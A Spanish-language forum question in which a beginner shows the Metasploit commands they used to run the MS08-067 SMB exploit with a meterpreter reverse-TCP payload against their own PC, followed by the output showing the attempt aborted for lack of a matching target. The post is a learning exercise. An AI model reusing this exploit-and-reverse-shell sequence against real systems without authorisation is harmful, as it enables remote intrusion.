Soy nuevo en kali linux y solo pruebas de penetración en general. Estoy teniendo un poco de problemas con el marco metasploit para entrar en mi propia PC. He usado este tutorial y obtengo un error que dice "Exploit abort debido a que no hay objetivos", y sin embargo, he proporcionado un objetivo. A continuación hay una lista de los comandos que he usado y el error.
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.0.104
lhost => 192.168.0.104
msf exploit(ms08_067_netapi) > set rhost 192.168.0.105
rhost => 192.168.0.105
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rport 445
rport => 445
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.0.104:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
[actualizar] aquí está la salida de 'mostrar opciones'
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.105 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.104 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting